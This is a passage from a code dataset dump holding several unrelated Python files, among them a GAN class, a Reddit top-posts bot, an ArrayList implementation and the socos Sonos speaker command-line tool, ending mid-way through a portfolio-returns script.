line.split(\" \")\n h.write(\"%s %s 0\\n\"%(sent_a,sent_b))\n cnt = np.random.randint(len(lines))\n h.write(\"%s %s 1\\n\"%(sent_a,lines[cnt].split(\" \")[1]))\n cnt = np.random.randint(len(lines))\n h.write(\"%s %s 1\\n\"%(sent_a,lines[cnt].split(\" \")[1]))\n cnt = np.random.randint(len(lines))\n h.write(\"%s %s 1\\n\"%(sent_a,lines[cnt].split(\" \")[1]))\n\n\n\nif __name__ == \"__main__\":\n #sent_pair_gen(\"./sent_pair_word.txt\")\n #zhengz_train_data_gen_sent_pairs()\n #pdb.set_trace()\n #seperate_zhengz_address(\"/home/dell/data/output_zz.txt\")\n\n 
#train_data_gen_sent_pairs(\"/home/dell/data/sent_pair_word.txt\",\"/home/dell/data/example_train_sentpair_zhongtianhuayuan\", \\\n #\"/home/dell/data/example_test_sentpair_zhongtianhuayuan\")\n #gen = read_xlrd(\"data/addr_guiyang_zhongtian_huayuan.xlsx\")\n #for i in gen:\n # print(i)\n #filename = sys.argv[1]\n #init_ner_train_data(filename)\n with open(\"match_sample_reverse.txt\",\"a+\") as gh:\n #gen = mark_from_txt_compare(\"/data/network_zz/output/doc_pre_handle.txt\")\n gen = read_xlrd(\"/home/dell/data/addr_guiyang_zhongtian_huayuan.xlsx\")\n print(gen)\n for i in gen:\n print(i)\n k = \"\".join(i[0])\n v = \"\".join([str(_) for _ in i[1]])\n for ii,jj in zip(k,v):\n gh.write(\"%s %s\\n\"%(ii,jj))\n gh.write(\"\\n\")\n gh.flush()\n #if \"1\" in \"\".join([str(_) for _ in i[1]]):\n # pdb.set_trace()\n\n","sub_path":"yunyan_baotou/src/business_ultra/mark_train_data.py","file_name":"mark_train_data.py","file_ext":"py","file_size_in_byte":9605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"355489025","text":"\"\"\"\nDisplay graphs of the data\n\"\"\"\n\nimport streamlit as st\nfrom facebook.data.fetch_from_api import get_fb_posts\n\n\ndef display_facebook():\n \"\"\"\n Display Facebook posts data\n \"\"\"\n fb_posts = get_fb_posts()\n st.header(\"Facebook posts\")\n st.write(fb_posts)\n st.subheader(\"Total likes\")\n st.line_chart(data=fb_posts['statistics.actual.likeCount'])\n","sub_path":"facebook/visualizations/graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"94995609","text":"from functools import partial\nimport tensorflow as tf\nimport neural_nets.nn as nn\n\nclass SimpleGan:\n\n def __init__(self,\n crop_size=100,\n lr=.0001,\n wasserstein=False):\n\n #\"\"\" graph \"\"\"\n # resnet_model\n self.generator = partial(nn.generator, scope='generator')\n self.discriminator = partial(nn.discriminator, scope='discriminator')\n\n\n # Placeholders\n self.real = tf.placeholder(tf.float32, shape=[None, crop_size, crop_size, 3])\n self.noise = tf.placeholder(tf.float32, shape=[None, crop_size, crop_size, 3])\n\n # Generator outputs\n self.generator_output = self.generator(self.noise)\n\n # Discriminator outputs\n self.discriminator_output_real = self.discriminator(self.real)\n self.discriminator_output_fake = self.discriminator(self.generator_output)\n\n if wasserstein:\n self.d_loss = tf.reduce_mean(self.discriminator_output_fake) - tf.reduce_mean(self.discriminator_output_real)\n self.g_loss = -tf.reduce_mean(self.discriminator_output_fake)\n\n else:\n # Generator loss\n self.g_loss = tf.losses.sigmoid_cross_entropy(logits=self.discriminator_output_fake, multi_class_labels=tf.ones_like(self.discriminator_output_fake))\n\n # Discriminator loss\n self.d_loss_real = tf.losses.sigmoid_cross_entropy(logits=self.discriminator_output_real, multi_class_labels=tf.ones_like(self.discriminator_output_real))\n self.d_loss_fake = tf.losses.sigmoid_cross_entropy(logits=self.discriminator_output_fake, multi_class_labels=tf.zeros_like(self.discriminator_output_fake))\n self.d_loss = self.d_loss_real + self.d_loss_fake\n\n\n # Optimization\n t_var = tf.trainable_variables()\n d_var = [var for var in t_var if 'discriminator' in var.name]\n g_var = [var for var in t_var if 'generator' in var.name]\n\n self.d_train_op = tf.train.AdamOptimizer(lr, beta1=0.5).minimize(self.d_loss, var_list=d_var)\n self.g_train_op = tf.train.AdamOptimizer(lr, beta1=0.5).minimize(self.g_loss, var_list=g_var)\n\n\n # \"\"\" train \"\"\"\n # ''' init '''\n # session\n config = tf.ConfigProto(allow_soft_placement=True)\n config.gpu_options.allow_growth = True\n self.sess = tf.Session(config=config)\n\n self.init_op = tf.global_variables_initializer()\n self.sess.run(self.init_op)\n\n #''' saver '''\n self.saver = tf.train.Saver(max_to_keep=None)","sub_path":"neural_nets/simple_gan.py","file_name":"simple_gan.py","file_ext":"py","file_size_in_byte":2539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"241422545","text":"#!/usr/bin/python3\n\n\"\"\"\nScript language: Python3\n\nTalks to:\n- Vega node (gRPC)\n\nApps/Libraries:\n- gRPC (node): Vega-API-client (https://pypi.org/project/Vega-API-client/)\n\"\"\"\n\n# Note: this file uses smart-tags in comments to section parts of the code to\n# show them as snippets in our documentation. They are not necessary to be\n# included when creating your own custom code.\n#\n# Example of smart-tags:\n# __something:\n# some code here\n# :something__\n\nimport os\nimport signal\nimport sys\n\n# __import_client:\nimport vegaapiclient as vac\n# :import_client__\n\nnode_url_grpc = os.getenv(\"NODE_URL_GRPC\")\n\ndef signal_handler(sig, frame):\n print('Exit requested.')\n sys.exit(0)\n\nsignal.signal(signal.SIGINT, signal_handler)\n\n# __create_client:\n# Create a Vega gRPC data client\ndata_client = vac.VegaTradingDataClient(node_url_grpc)\n# :create_client__\n\n# __find_market:\n# Get a list of markets, and select the first market returned\nmarkets = data_client.Markets(vac.api.trading.MarketsRequest()).markets\nmarket_id = markets[0].id\n# :find_market__\n\n# __stream_orders:\n# Subscribe to the Orders stream for the marketID specified\n# Optional: Market identifier - filter by market\n# Party identifier - filter by party\n# By default, all orders on all markets for all parties will be returned on the stream.\nsubscribe_request = vac.api.trading.OrdersSubscribeRequest(market_id=market_id)\nfor stream_resp in data_client.OrdersSubscribe(subscribe_request):\n for order in stream_resp.orders:\n # All orders arriving over the channel/stream will be printed\n print(order)\n# :stream_orders__\n","sub_path":"stream-orders-and-trades/stream-orders-with-Vega-API-client.py","file_name":"stream-orders-with-Vega-API-client.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"247570126","text":"import praw\r\nimport time\r\n\r\n\r\ndef main():\r\n posttopfifty()\r\n postlog()\r\n\r\ndef posttopfifty():\r\n topfifty = \"Post# | Title | Subreddit | Url | Upvotes \\n ---|---|---|----|---- \\n\"\r\n counter = 1\r\n for submission in reddit.subreddit('all').top('day', limit=50):\r\n topfifty += \"{} | {} | /r/{} | [link]({}) | {} \\n\".format(counter, submission.title, submission.subreddit,\r\n submission.url, submission.score)\r\n counter += 1\r\n reddit.subreddit('GraxPy').submit(time.strftime('%m/%d/%y'), topfifty)\r\n print('posted')\r\n\r\n\r\ndef postlog():\r\n f = open(r'C:\\Users\\Wilson\\desktop\\python.txt', 'w')\r\n f.write('Posted to reddit: {}\\n'.format(time.strftime('%x %X')))\r\n f.close()\r\n\r\nif __name__ == '__main__':\r\n reddit = praw.Reddit('bot')\r\n main()\r\n","sub_path":"GraxPyPost.py","file_name":"GraxPyPost.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"463772432","text":"# An ArrayList is one of\r\n# - None\r\n# - ArrayList(array, int, int)\r\nclass ArrayList:\r\n def __init__(self, array, size, capacity=10):\r\n if array == [None] or array is None:\r\n self.array = [None] * capacity\r\n else:\r\n self.array = array\r\n self.size = size\r\n self.capacity = capacity\r\n\r\n def __eq__(self, other):\r\n return ((type(other) == ArrayList)\r\n and self.array == other.array\r\n and self.size == other.size\r\n and self.capacity == other.capacity\r\n )\r\n\r\n def __repr__(self):\r\n return \"ArrayList({!r}, {!r}, {!r})\".format(self.array, self.size, self.capacity)\r\n\r\n\r\n# None -> ArrayList\r\n# Returns an empty ArrayList\r\ndef empty_list():\r\n return ArrayList([None], 0)\r\n\r\n\r\n# ArrayList int value -> ArrayList\r\n# Takes an ArrayList, an index, and a value, places the value at the given index in the list, and returns it\r\ndef add(array, index, value):\r\n if array.size == array.capacity:\r\n array = double_capacity(array)\r\n\r\n if index > array.size or index < 0:\r\n raise IndexError\r\n else:\r\n for i in range(array.size - 1, index - 1, -1):\r\n array.array[i + 1] = array.array[i]\r\n array.array[index] = value\r\n array.size += 1\r\n return array\r\n\r\n\r\n# ArrayList -> ArrayList\r\n# Doubles the capacity of an ArrayList\r\ndef double_capacity(array):\r\n double = ArrayList([None], array.size, array.capacity * 2)\r\n for i in range(array.size):\r\n double.array[i] = array.array[i]\r\n return double\r\n\r\n\r\n# ArrayList -> int\r\n# Takes an ArrayList and returns the number of elements in the list\r\ndef length(array):\r\n return array.size\r\n\r\n\r\n# ArrayList int -> value\r\n# Takes an ArrayList and an index and returns the value at the given index\r\ndef get(array, index):\r\n if index >= array.size or index < 0:\r\n raise IndexError\r\n else:\r\n return array.array[index]\r\n\r\n\r\n# ArrayList int value -> AnyList\r\n# Takes an ArrayList, an index, and a value and replaces the element at the index in the list with the given value\r\ndef set(array, index, value):\r\n if index >= array.size or index < 0:\r\n raise IndexError\r\n else:\r\n array.array[index] = value\r\n return array\r\n\r\n\r\n# ArrayList int -> (value, ArrayList)\r\n# Takes an ArrayList and an index and removes the element at the index, returning the removed element and resulting list\r\ndef remove(array, index):\r\n if index >= array.size or index < 0:\r\n raise IndexError\r\n else:\r\n num = array.array[index]\r\n for i in range(index + 1, array.size):\r\n array.array[i - 1] = array.array[i]\r\n array.array[array.size - 1] = None\r\n array.size -= 1\r\n return num, array\r\n","sub_path":"Projects/project-3-gmonteir/array_list.py","file_name":"array_list.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"309102035","text":"#!/usr/bin/env python\n\n\"\"\" socos is a commandline tool for controlling Sonos speakers \"\"\"\n\nfrom __future__ import print_function\n\n\n# Will be parsed by setup.py to determine package metadata\n__author__ = 'SoCo team '\n__version__ = '0.1'\n__website__ = 'https://github.com/SoCo/socos'\n__license__ = 'MIT License'\n\n\nimport sys\nimport os\nfrom collections import OrderedDict\nimport sqlite3\nimport json\nimport shlex\n\ntry:\n # pylint: disable=import-error\n import colorama\nexcept ImportError:\n # pylint: disable=invalid-name\n colorama = None\n\ntry:\n import readline\nexcept ImportError:\n # pylint: disable=invalid-name\n readline = None\n\ntry:\n # pylint: disable=redefined-builtin,invalid-name,undefined-variable\n input = raw_input\nexcept NameError:\n # raw_input has been renamed to input in Python 3\n pass\n\nimport soco\nfrom soco.data_structures import MLTrack, MLAlbum, MLArtist, MLPlaylist\n\n\nclass MusicLibrary(object):\n \"\"\"Class that implements the music library support for socos\"\"\"\n\n def __init__(self):\n # Sqlite3 variables\n self.connection = None\n self.cursor = None\n # As a simple opitmization we cache 10 searches\n self.cached_searches = OrderedDict()\n self.cache_length = 10\n # Date type and tables names\n self.data_types = ['playlists', 'artists', 'albums', 'tracks']\n\n def _open_db(self):\n \"\"\"Open a connection to the sqlite3 database and if necessary create\n the the folders and path for it. The file will be saved to:\n USERPATH/.config/socos/musiclib.db where USERPATH is as returned by\n os.path.expanduser\n \"\"\"\n if not self.connection:\n userdir = os.path.expanduser('~')\n dbdir = os.path.join(userdir, '.config', 'socos')\n if not os.path.exists(dbdir):\n os.makedirs(dbdir)\n yield 'Created folder: \\'{}\\''.format(dbdir)\n\n dbpath = os.path.join(dbdir, 'musiclib.db')\n if not os.path.exists(dbpath):\n yield 'Created Sqlite3 database for music library '\\\n 'information at: \\'{}\\''.format(dbpath)\n self.connection = sqlite3.connect(dbpath)\n self.cursor = self.connection.cursor()\n\n def index(self, sonos):\n \"\"\"Update the index of the music library information\"\"\"\n for string in self._open_db():\n yield string\n # Drop old tables\n query = 'SELECT name FROM sqlite_master WHERE type = \"table\"'\n self.cursor.execute(query)\n number_of_tables = len(self.cursor.fetchall())\n if number_of_tables == 4:\n yield 'Deleting tables'\n query = 'DROP TABLE {}'\n for table_name in self.data_types:\n self.cursor.execute(query.format(table_name))\n self.connection.commit()\n\n # Form new tables\n yield 'Creating tables'\n create_statements = [\n 'CREATE TABLE tracks (title text, album text, artist text, '\n 'content text)',\n 'CREATE TABLE albums (title text, artist text, content text)',\n 'CREATE TABLE artists (title text, content text)',\n 'CREATE TABLE playlists (title text, content text)',\n ]\n for create in create_statements:\n self.cursor.execute(create)\n self.connection.commit()\n\n # Index the 4 different types of data\n for data_type in self.data_types:\n for string in self._index_single_type(sonos, data_type):\n yield string\n\n def _index_single_type(self, sonos, data_type):\n \"\"\"Index a single type if data\"\"\"\n fields = self._get_columns(data_type)\n # Artist is called creator in the UPnP data structures\n if 'artist' in fields:\n fields[fields.index('artist')] = 'creator'\n\n # E.g: INSERT INTO tracks VALUES (?,?,?,?)\n query = 'INSERT INTO {} VALUES ({})'.format(\n data_type, 
','.join(['?'] * len(fields)))\n\n # For brevity\n get_ml_inf = sonos.get_music_library_information\n\n total = get_ml_inf(data_type, 0, 1)['total_matches']\n yield 'Adding: {}'.format(data_type)\n count = 0\n while count < total:\n # Get as many matches as the device will give each time\n search = get_ml_inf(data_type, start=count, max_items=1000)\n for item in search['item_list']:\n # In the database we save a set of text fields and the content\n # dict as json. See self.index for details on fields.\n values = [getattr(item, field) for field in\n fields[:-1]]\n values.append(json.dumps(item.to_dict))\n self.cursor.execute(query, values)\n self.connection.commit()\n\n # Print out status while running because indexing tracks can take a\n # while\n count += search['number_returned']\n yield '{{: >3}}% {{: >{0}}} out of {{: >{0}}}'\\\n .format(len(str(total)))\\\n .format(count * 100 / total, count, total)\n\n def _get_columns(self, table):\n \"\"\"Return the names of the columns in the table\"\"\"\n query = 'PRAGMA table_info({})'.format(table)\n self.cursor.execute(query)\n # The table descriptions look like: (0, u'title', u'text', 0, None, 0)\n return [element[1] for element in self.cursor.fetchall()]\n\n def tracks(self, sonos, *args):\n \"\"\"Search for and possibly play tracks from the music library\n\n Usage: ml_tracks [field=]text [action] [number]\n\n Field can be 'title', 'album' or 'artist'. If field is not given, then\n 'title' is used. Only a single word can be used as search text. Action\n can be 'add' or 'replace' and number refers to the item number in the\n search results.\n\n Examples:\n ml_tracks artist=metallica\n ml_tracks unforgiven\n ml_tracks unforgiven add 4\n \"\"\"\n for string in self._search_and_play(sonos, 'tracks', *args):\n yield string\n\n def albums(self, sonos, *args):\n \"\"\"Search for and possibly play albums from the music library\n\n Usage: ml_albums [field=]text [action] [number]\n\n Field can be 'title' or 'artist'. If field is not given, then 'title'\n is used. Only a single word can be used as search text. Action can be\n 'add' or 'replace' and number refers to the item number in the search\n results.\n\n Examples:\n ml_albums artist=metallica\n ml_albums black\n ml_albums black add 1\n \"\"\"\n for string in self._search_and_play(sonos, 'albums', *args):\n yield string\n\n def artists(self, sonos, *args):\n \"\"\"Search for and possibly play all by artists from music library\n\n Usage: ml_artists text [action] [number]\n\n 'text' is searched for in the artist titles. Only a single word can '\\\n 'be used as search text. Action can be 'add' or 'replace' and number '\\\n 'refers to the item number in the search results.\n\n Examples:\n ml_artists metallica\n ml_artists metallica add 1\n \"\"\"\n for string in self._search_and_play(sonos, 'artists', *args):\n yield string\n\n def playlists(self, sonos, *args):\n \"\"\"Search for and possibly play playlists imported in the music library\n\n Usage: ml_playlists text [action] [number]\n\n 'text' is searched for in the playlist titles. Only a single word '\\\n 'can be used as search text. 
Action can be 'add' or 'replace' and '\\\n 'number refers to the item number in the search results.\n\n Examples:\n ml_playlist metallica\n ml_playlist metallica add 3\n \"\"\"\n for string in self._search_and_play(sonos, 'playlists', *args):\n yield string\n\n def _search_and_play(self, sonos, data_type, *args):\n \"\"\"Perform a music library search and possibly play and item\"\"\"\n # Open the data base\n for string in self._open_db():\n yield string\n\n # Check if the music library has been indexed\n query = 'SELECT name FROM sqlite_master WHERE type = \"table\"'\n self.cursor.execute(query)\n if len(self.cursor.fetchall()) != 4:\n message = 'Your music library cannot be search until it has been '\\\n 'indexed. First run \\'ml_index\\''\n raise TypeError(message)\n # Check if there is a search term\n if len(args) < 1:\n message = 'Search term missing. See \\'help ml_{}\\' for details'.\\\n format(data_type)\n raise TypeError(message)\n\n # And finally perform the search\n results = self._search(data_type, *args)\n\n # If there are no other arguments then the search\n if len(args) == 1:\n for string in self._print_results(data_type, results):\n yield string\n # Or if there are the right number for a play command\n elif len(args) == 3:\n yield self._play(sonos, data_type, results, *args)\n # Else give error\n else:\n message = 'Incorrect play syntax: See \\'help ml_{}\\' for details'.\\\n format(data_type)\n raise TypeError(message)\n\n def _search(self, data_type, *args):\n \"\"\"Perform the search\"\"\"\n # Process search term\n search_string = args[0]\n if search_string.count('=') == 0:\n field = 'title'\n search = search_string\n elif search_string.count('=') == 1:\n field, search = search_string.split('=')\n else:\n message = '= signs are not allowed in the search string'\n raise TypeError(message)\n\n # Pad the search term with SQL LIKE wild cards\n search = search.join(['%', '%'])\n # Do the search, if it has not been cached\n if (data_type, field, search) in self.cached_searches:\n results = self.cached_searches[(data_type, field, search)]\n else:\n if field in self._get_columns(data_type)[:-1]:\n # Perform the search in Sqlite3\n query = 'SELECT * FROM {} WHERE {} LIKE ?'.format(data_type,\n field)\n try:\n search = search.decode('utf-8')\n except AttributeError:\n pass\n self.cursor.execute(query, [search])\n results = self.cursor.fetchall()\n # Add results to the cache and reduce cache length if necesary\n self.cached_searches[(data_type, field, search)] = results\n while len(self.cached_searches) > self.cache_length:\n self.cached_searches.popitem(last=False)\n else:\n message = 'The search field \\'{}\\' is unknown. 
Only {} is '\\\n 'allowed'.format(field, self._get_columns(data_type)[:-1])\n raise TypeError(message)\n return results\n\n @staticmethod\n def _play(sonos, data_type, results, *args):\n \"\"\"Play music library item from search\"\"\"\n action, number = args[1:]\n # Check action\n if action not in ['add', 'replace']:\n message = 'Action must be \\'add\\' or \\'replace\\''\n raise TypeError(message)\n\n # Convert and check number\n try:\n number = int(number) - 1\n except ValueError:\n raise TypeError('Play number must be parseable as integer')\n if number not in range(len(results)):\n if len(results) == 0:\n message = 'No results to play from'\n elif len(results) == 1:\n message = 'Play number can only be 1'\n else:\n message = 'Play number has to be in the range from 1 to {}'.\\\n format(len(results))\n raise TypeError(message)\n\n # The last item in the search is the content dict in json\n item_dict = json.loads(results[number][-1])\n ml_classes = {'tracks': MLTrack, 'albums': MLAlbum,\n 'artists': MLArtist, 'playlists': MLPlaylist}\n item = ml_classes[data_type].from_dict(item_dict)\n\n # Save state before queue manipulation\n player_state = state(sonos)\n out = 'Added to queue: \\'{}\\''\n if action == 'replace':\n sonos.clear_queue()\n out = 'Queue replaced with: \\'{}\\''\n sonos.add_to_queue(item)\n if action == 'replace' and player_state == 'PLAYING':\n sonos.play()\n\n title = item.title\n if hasattr(title, 'decode'):\n title = title.encode('utf-8')\n return out.format(title)\n\n @staticmethod\n def _print_results(data_type, results):\n \"\"\"Print the results out nicely\"\"\"\n print_patterns = {\n u'tracks': '\\'{title}\\' on \\'{album}\\' by \\'{creator}\\'',\n u'albums': '\\'{title}\\' by \\'{creator}\\'',\n u'artists': '\\'{title}\\'',\n u'playlists': '\\'{title}\\''\n }\n # Length of the results length number\n index_length = len(str(len(results)))\n for index, item in enumerate(results):\n item_dict = json.loads(item[-1])\n for key, value in item_dict.items():\n if hasattr(value, 'decode'):\n item_dict[key] = value.encode('utf-8')\n number = '({{: >{}}}) '.format(index_length).format(index + 1)\n # pylint: disable=star-args\n yield number + print_patterns[data_type].format(**item_dict)\n\n\n# current speaker (used only in interactive mode)\nCUR_SPEAKER = None\n# Instance of music library class\nMUSIC_LIB = MusicLibrary()\n\n\ndef main():\n \"\"\" main switches between (non-)interactive mode \"\"\"\n args = sys.argv[1:]\n\n if args:\n # process command and exit\n process_cmd(args)\n else:\n # start interactive shell\n shell()\n\n\ndef process_cmd(args):\n \"\"\" Processes a single command \"\"\"\n\n cmd = args.pop(0).lower()\n\n if cmd not in COMMANDS:\n err('Unknown command \"{cmd}\"'.format(cmd=cmd))\n err(get_help())\n return False\n\n func, args = _check_args(cmd, args)\n\n try:\n result = _call_func(func, args)\n except TypeError as ex:\n err(ex)\n return\n\n # colorama.init() takes over stdout/stderr to give cross-platform colors\n if colorama:\n colorama.init()\n\n # process output\n if result is None:\n pass\n\n elif hasattr(result, '__iter__'):\n try:\n for line in result:\n print(line)\n except TypeError as ex:\n err(ex)\n return\n\n else:\n print(result)\n\n # Release stdout/stderr from colorama\n if colorama:\n colorama.deinit()\n\n\ndef _call_func(func, args):\n \"\"\" handles str-based functions and calls appropriately \"\"\"\n\n # determine how to call function\n if isinstance(func, str):\n sonos = args.pop(0)\n method = getattr(sonos, func)\n return 
method(*args) # pylint: disable=star-args\n\n else:\n return func(*args) # pylint: disable=star-args\n\n\ndef _check_args(cmd, args):\n \"\"\" checks if func is called for a speaker and updates 'args' \"\"\"\n\n req_ip, func = COMMANDS[cmd]\n\n if not req_ip:\n return func, args\n\n if not CUR_SPEAKER:\n if not args:\n err('Please specify a speaker IP for \"{cmd}\".'.format(cmd=cmd))\n return None, None\n else:\n speaker_spec = args.pop(0)\n sonos = soco.SoCo(speaker_spec)\n args.insert(0, sonos)\n else:\n args.insert(0, CUR_SPEAKER)\n\n return func, args\n\n\ndef shell():\n \"\"\" Start an interactive shell \"\"\"\n\n if readline is not None:\n readline.parse_and_bind('tab: complete')\n readline.set_completer(complete_command)\n readline.set_completer_delims(' ')\n\n while True:\n try:\n # Not sure why this is necessary, as there is a player_name attr\n # pylint: disable=no-member\n if CUR_SPEAKER:\n line = input('socos({speaker}|{state})> '.format(\n speaker=CUR_SPEAKER.player_name,\n state=state(CUR_SPEAKER).title()).encode('utf-8'))\n else:\n line = input('socos> ')\n except EOFError:\n print('')\n break\n except KeyboardInterrupt:\n print('')\n continue\n\n line = line.strip()\n if not line:\n continue\n\n try:\n args = shlex.split(line)\n except ValueError as value_error:\n err('Syntax error: %(error)s' % {'error': value_error})\n continue\n\n try:\n process_cmd(args)\n except KeyboardInterrupt:\n err('Keyboard interrupt.')\n except EOFError:\n err('EOF.')\n\n\ndef complete_command(text, context):\n \"\"\" auto-complete commands\n\n text is the text to be auto-completed\n context is an index, increased for every call for \"text\" to get next match\n \"\"\"\n matches = [cmd for cmd in COMMANDS.keys() if cmd.startswith(text)]\n return matches[context]\n\n\ndef adjust_volume(sonos, operator):\n \"\"\" Adjust the volume up or down with a factor from 1 to 100 \"\"\"\n factor = get_volume_adjustment_factor(operator)\n if not factor:\n return False\n\n vol = sonos.volume\n\n if operator[0] == '+':\n if (vol + factor) > 100:\n factor = 1\n sonos.volume = (vol + factor)\n return sonos.volume\n elif operator[0] == '-':\n if (vol - factor) < 0:\n factor = 1\n sonos.volume = (vol - factor)\n return sonos.volume\n else:\n err(\"Valid operators for volume are + and -\")\n\n\ndef get_volume_adjustment_factor(operator):\n \"\"\" get the factor to adjust the volume with \"\"\"\n factor = 1\n if len(operator) > 1:\n try:\n factor = int(operator[1:])\n except ValueError:\n err(\"Adjustment factor for volume has to be a int.\")\n return\n return factor\n\n\ndef get_current_track_info(sonos):\n \"\"\" Show the current track \"\"\"\n track = sonos.get_current_track_info()\n return (\n \"Current track: %s - %s. From album %s. This is track number\"\n \" %s in the playlist. It is %s minutes long.\" % (\n track['artist'],\n track['title'],\n track['album'],\n track['playlist_position'],\n track['duration'],\n )\n )\n\n\ndef get_queue(sonos):\n \"\"\" Show the current queue \"\"\"\n queue = sonos.get_queue()\n\n # pylint: disable=invalid-name\n ANSI_BOLD = '\\033[1m'\n ANSI_RESET = '\\033[0m'\n\n current = int(sonos.get_current_track_info()['playlist_position'])\n\n queue_length = len(queue)\n padding = len(str(queue_length))\n\n for idx, track in enumerate(queue, 1):\n if idx == current:\n color = ANSI_BOLD\n else:\n color = ANSI_RESET\n\n idx = str(idx).rjust(padding)\n yield (\n \"%s%s: %s - %s. 
From album %s.\" % (\n color,\n idx,\n track.creator,\n track.title,\n track.album,\n )\n )\n\n\ndef err(message):\n \"\"\" print an error message \"\"\"\n print(message, file=sys.stderr)\n\n\ndef play_index(sonos, index):\n \"\"\" Play an item from the playlist \"\"\"\n queue_length = len(sonos.get_queue())\n try:\n index = int(index) - 1\n if index >= 0 and index < queue_length:\n position = sonos.get_current_track_info()['playlist_position']\n current = int(position) - 1\n if index != current:\n return sonos.play_from_queue(index)\n else:\n raise ValueError()\n except ValueError():\n return \"Index has to be a integer within \\\n the range 1 - %d\" % queue_length\n\n\ndef list_ips():\n \"\"\" List available devices \"\"\"\n sonos = soco.SonosDiscovery()\n return sonos.get_speaker_ips()\n\n\ndef speaker_info(sonos):\n \"\"\" Information about a speaker \"\"\"\n infos = sonos.get_speaker_info()\n return ('%s: %s' % (i, infos[i]) for i in infos)\n\n\ndef volume(sonos, *args):\n \"\"\" Change or show the volume of a device \"\"\"\n if args:\n operator = args[0].lower()\n adjust_volume(sonos, operator)\n\n return sonos.volume\n\n\ndef exit_shell():\n \"\"\" Exit socos \"\"\"\n sys.exit(0)\n\n\ndef play(sonos, *args):\n \"\"\" Start playing \"\"\"\n if args:\n idx = args[0]\n play_index(sonos, idx)\n else:\n sonos.play()\n return get_current_track_info(sonos)\n\n\ndef play_next(sonos):\n \"\"\" Play the next track \"\"\"\n sonos.next()\n return get_current_track_info(sonos)\n\n\ndef play_previous(sonos):\n \"\"\" Play the previous track \"\"\"\n sonos.previous()\n return get_current_track_info(sonos)\n\n\ndef state(sonos):\n \"\"\" Get the current state of a device / group \"\"\"\n return sonos.get_current_transport_info()['current_transport_state']\n\n\ndef set_speaker(ip_address):\n \"\"\" set the current speaker for the shell session \"\"\"\n # pylint: disable=global-statement,fixme\n # TODO: this should be refactored into a class with instance-wide state\n global CUR_SPEAKER\n CUR_SPEAKER = soco.SoCo(ip_address)\n\n\ndef unset_speaker():\n \"\"\" resets the current speaker for the shell session \"\"\"\n global CUR_SPEAKER # pylint: disable=global-statement\n CUR_SPEAKER = None\n\n\ndef get_help(command=None):\n \"\"\" Prints a list of commands with short description \"\"\"\n\n def _cmd_summary(item):\n \"\"\" Format command name and first line of docstring \"\"\"\n name, func = item[0], item[1][1]\n if isinstance(func, str):\n func = getattr(soco.SoCo, func)\n doc = getattr(func, '__doc__') or ''\n doc = doc.split('\\n')[0].lstrip()\n return ' * {cmd:12s} {doc}'.format(cmd=name, doc=doc)\n\n if command and command in COMMANDS:\n func = COMMANDS[command][1]\n doc = getattr(func, '__doc__') or ''\n doc = [line.lstrip() for line in doc.split('\\n')]\n out = '\\n'.join(doc)\n else:\n texts = ['Available commands:']\n # pylint: disable=bad-builtin\n texts += map(_cmd_summary, COMMANDS.items())\n out = '\\n'.join(texts)\n return out\n\n\n# COMMANDS indexes commands by their name. 
Each command is a 2-tuple of\n# (requires_ip, function) where function is either a callable, or a\n# method name to be called on a SoCo instance (depending on requires_ip)\n# If requires_ip is False, function must be a callable.\nCOMMANDS = OrderedDict((\n # cmd req IP func\n # pylint: disable=bad-whitespace\n ('list', (False, list_ips)),\n ('partymode', (True, 'partymode')),\n ('info', (True, speaker_info)),\n ('play', (True, play)),\n ('pause', (True, 'pause')),\n ('stop', (True, 'stop')),\n ('next', (True, play_next)),\n ('previous', (True, play_previous)),\n ('current', (True, get_current_track_info)),\n ('queue', (True, get_queue)),\n ('volume', (True, volume)),\n ('state', (True, state)),\n ('ml_index', (True, MUSIC_LIB.index)),\n ('ml_tracks', (True, MUSIC_LIB.tracks)),\n ('ml_albums', (True, MUSIC_LIB.albums)),\n ('ml_artists', (True, MUSIC_LIB.artists)),\n ('ml_playlists', (True, MUSIC_LIB.playlists)),\n ('exit', (False, exit_shell)),\n ('set', (False, set_speaker)),\n ('unset', (False, unset_speaker)),\n ('help', (False, get_help)),\n))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"socos.py","file_name":"socos.py","file_ext":"py","file_size_in_byte":23755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"612342666","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\ncovarMat = pd.read_csv('/home/hassan/Downloads/Book1.csv')\nreturns = pd.read_csv('/home/hassan/Downloads/Book2.csv')\ntBills = pd.read_csv('/home/hassan/Downloads/Book3.csv')\ntBills.drop(0,inplace=True)\n\nsP500 = pd.read_csv('/home/hassan/Downloads/Book4.csv')\nasset_pctChange_daily = pd.read_csv('/home/hassan/Downloads/Book5.csv')\nasset_pctChange_daily.drop('S&P500',axis=1,inplace=True)\nomega = np.array(covarMat)\nreturns = returns[['Stock code' , 'avg_expected_return']]\nexp_returns = np.array(returns['avg_expected_return'])\nassets = 20\nassets_ref = 2\nasset_pctChange = np.array(asset_pctChange_daily)\n\n\n\n\nrisk_free_rate = 0.021\ntBills.drop('Unnamed: 2', axis=1, inplace=True)\n\nfor i in range(len(tBills)):\n\ttBills.loc[i+1,'Tbills'] = tBills.loc[i+1,'Tbills']/100\n\n\n\ntBills_sP500 = tBills.merge(sP500, on='Time Period')\npctCh_sP500 = tBills_sP500['S&P 500'].pct_change()\ndf_pctCh_sP500 = pd.DataFrame({'pctCh_sP500': pctCh_sP500})\n\n\npctCh_sP500_tBills = df_pctCh_sP500.join(tBills_sP500['Tbills'])\n\nch1 = pctCh_sP500_tBills.describe()\nch2 = pctCh_sP500_tBills.corr()\ncorr_ref = 